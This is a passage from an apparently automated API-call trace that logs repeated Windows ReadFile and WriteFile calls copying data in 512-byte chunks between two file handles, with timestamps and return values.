nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.718] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.718] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.719] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.719] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.720] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.720] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.721] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.721] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.722] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.722] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.723] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.723] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.724] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.724] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.725] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.725] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.726] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.726] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.727] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.727] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.728] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.728] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.729] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.729] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.730] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.730] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.731] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.731] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.732] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.732] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.733] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.733] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.734] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.734] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.735] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.735] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.736] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.736] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.736] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.737] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.737] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.738] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.738] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.739] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.739] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.740] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.740] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.745] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.745] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.746] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.747] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.747] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.748] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.748] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.749] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.749] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.750] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.750] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.751] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.751] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.753] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.756] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.757] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.757] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.758] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.758] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.759] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.759] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.760] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.760] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.761] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.761] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.762] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.762] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.762] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.763] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.764] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.764] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.764] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.765] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.765] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.766] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.766] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.767] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.768] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.768] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.769] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.769] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.770] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.770] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.771] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.771] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.773] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.773] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.774] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.774] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.775] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.775] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.776] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.776] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, 